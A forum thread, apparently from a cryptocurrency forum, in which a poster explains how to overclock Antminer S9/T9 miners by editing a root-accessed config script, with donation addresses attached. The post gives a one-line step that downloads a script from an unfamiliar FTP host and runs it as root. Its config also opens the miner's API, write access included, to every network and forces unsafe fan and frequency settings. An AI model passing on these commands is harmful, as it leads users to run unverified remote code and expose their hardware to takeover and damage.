Pages:
Author

Topic: How To Overclock Your S9/T9+,T9,R4 To 18TH/s Free. - page 3. (Read 2977 times)

member
Activity: 133
Merit: 11
Hi guys...ive ssh into antminer T9+ .....what command in "putty" do i need to access config file?  complete noob in doing this so any help appreciated : )

vi /www/pages/cgi-bin/set_miner_conf.cgi
legendary
Activity: 3234
Merit: 2943
Block halving is coming.
Is it real? About this (S9 can be 17 - 17 TH/s hashrate.(PS:miner PSU must more than 2300Watt)) if I follow your method it could increase the hashing rate to 17 TH/s?
Let me ask if it is safe for s9 if I change the config and set freq. it to 1?
Could you share me your temps of hashing board while mining with 17TH/s?
sr. member
Activity: 800
Merit: 293
Created AutoTune to saved the planet! ~USA
Thankyou i will edit

Can you make it do the same but for 1600w aka the max the bitmain psu does for the s9?
member
Activity: 287
Merit: 18
Hi guys...ive ssh into antminer T9+ .....what command in "putty" do i need to access config file?  complete noob in doing this so any help appreciated : )
newbie
Activity: 4
Merit: 2
Thankyou i will edit
member
Activity: 133
Merit: 11
Cool but to me looks like it should be from line 96-135
Here is my code from 96-135. Am I right?

Code:
echo "{"                                                                        >  /config/bmminer.conf
echo "\"pools\" : ["                                                            >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool1url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool1user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool1pw}\""                                            >> /config/bmminer.conf
echo "},"                                                                       >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool2url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool2user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool2pw}\""                                            >> /config/bmminer.conf
echo "},"                                                                       >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool3url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool3user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool3pw}\""                                            >> /config/bmminer.conf
echo "}"                                                                        >> /config/bmminer.conf
echo "]"                                                                        >> /config/bmminer.conf
echo ","                                                                        >> /config/bmminer.conf
echo "\"api-listen\" : "true","                                                 >> /config/bmminer.conf
echo "\"api-network\" : "true","                                                >> /config/bmminer.conf
echo "\"api-groups\" : \"A:stats:pools:devs:summary:version\","                          >> /config/bmminer.conf
echo "\"api-allow\" : \"A:0/0,W:*\","                       >> /config/bmminer.conf
if [ "${ant_nobeeper}" = "true" ]; then
        echo "\"bitmain-nobeeper\" : "true","                                   >> /config/bmminer.conf
fi
if [ "${ant_notempoverctrl}" = "true" ]; then
        echo "\"bitmain-notempoverctrl\" : "true","                             >> /config/bmminer.conf
fi

if [ "${ant_fan_customize_switch}" = "true" ]; then
        echo "\"bitmain-fan-ctrl\" : "true","                           >> /config/bmminer.conf
        echo "\"bitmain-fan-pwm\" : \"${ant_fan_customize_value}\","    >> /config/bmminer.conf

fi
echo "\"bitmain-use-vil\" : "true","                            >> /config/bmminer.conf
echo "\"bitmain-freq\" : \"${ant_freq}\","                              >> /config/bmminer.conf
echo "\"bitmain-voltage\" : \"${ant_voltage}\","                                >> /config/bmminer.conf
echo "\"multi-version\" : \"1\""                                                >> /config/bmminer.conf
echo "}"
newbie
Activity: 4
Merit: 2
can this be modified so you can pick the frequency that works best on your particular miner or using a lower watt PSU? for exa,ple instead of 17TH at 2,300 watts can this be clocked lower to run say 15TH at a lower power draw so it can run on an 1,800 Watt PSU?

it needs compile binary files.. i can do it. but it is so diffculty...
legendary
Activity: 1167
Merit: 1009
can this be modified so you can pick the frequency that works best on your particular miner or using a lower watt PSU? for exa,ple instead of 17TH at 2,300 watts can this be clocked lower to run say 15TH at a lower power draw so it can run on an 1,800 Watt PSU?
newbie
Activity: 4
Merit: 2
How to overclock your miner.
first, you need using SSH login your miner.

Port is 22 ,IP is your miner IP. Username is :Root, Password is :admin(not incloud space)
It using an antminer BMminer Bug. if u enable 'Fix Freq' Switch and set Freq to 1 ,Then your miner will runs at 850Freq,
S9 can be 17 - 18.5 TH/s hashrate.(PS:miner PSU must more than 2300Watt)
T9+ can be 14
5-15.5 TH/s hashrate (needs 2300W)

How to edit?
First,login your miner SSH.then edit /www/pages/cgi-bin/set_miner_conf.cgi
Edit line 96 to 135(Style like this..),and replace to these:

Code:
echo "{"                                                                        >  /config/bmminer.conf
echo "\"pools\" : ["                                                            >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool1url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool1user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool1pw}\""                                            >> /config/bmminer.conf
echo "},"                                                                       >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool2url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool2user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool2pw}\""                                            >> /config/bmminer.conf
echo "},"                                                                       >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool3url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool3user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool3pw}\""                                            >> /config/bmminer.conf
echo "}"                                                                        >> /config/bmminer.conf
echo "]"                                                                        >> /config/bmminer.conf
echo ","                                                                        >> /config/bmminer.conf
echo "\"api-listen\" : "true","                                                 >> /config/bmminer.conf
echo "\"api-network\" : "true","                                                >> /config/bmminer.conf
echo "\"api-groups\" : \"A:stats:pools:devs:summary:version\","                 >> /config/bmminer.conf
echo "\"api-allow\" : \"A:0/0,W:*\","                                           >> /config/bmminer.conf
if [ "${ant_nobeeper}" = "true" ]; then
        echo "\"bitmain-nobeeper\" : "true","                                   >> /config/bmminer.conf
fi
if [ "${ant_notempoverctrl}" = "true" ]; then
        echo "\"bitmain-notempoverctrl\" : "true","                             >> /config/bmminer.conf
fi

echo "\"bitmain-fan-ctrl\" : "true","                                           >> /config/bmminer.conf
echo "\"bitmain-fan-pwm\" : \"100\","    >> /config/bmminer.conf
echo "\"fixed-freq\" : "true","                            >> /config/bmminer.conf
echo "\"bitmain-freq\" : \"1\","                              >> /config/bmminer.conf
echo "\"bitmain-voltage\" : \"200\","                                >> /config/bmminer.conf
echo "\"multi-version\" : \"1\""                                                >> /config/bmminer.conf
echo "}"                                                                >> /config/bmminer.conf

If you don't likes edit so more.
just using my 1 key Script:

Code:
cd /
wget ftp://html.hashthing.miner.ink:43231/9serial.sh
chmod 777 /9serial.sh
sh 9serial.sh

Edit after, login to your miner web.
save your ""Miner Configuration"" ,and Save&Apply
Enjoy Your HighHashrate!!

If you success, Please donate me some coins.
Donate Me BCH:1P3hYkpcGLrWhnP7SxpHag9mtqmg9FF4Rg (Thanks..)
Donate Me BTC:16TwadK7mBvYYkhhC7HJa3qfxbTUzogyE6 (Thanks.)

If you need Customize Your miner Hashrate or watt, You can send mail to us :[email protected]

We tested S9 13T  --> 17.5T
S9 14T --> 18.5T
T9 --> 16T
T9+ --> 15.5T
R4 (didn't test)
Pages:
Jump to: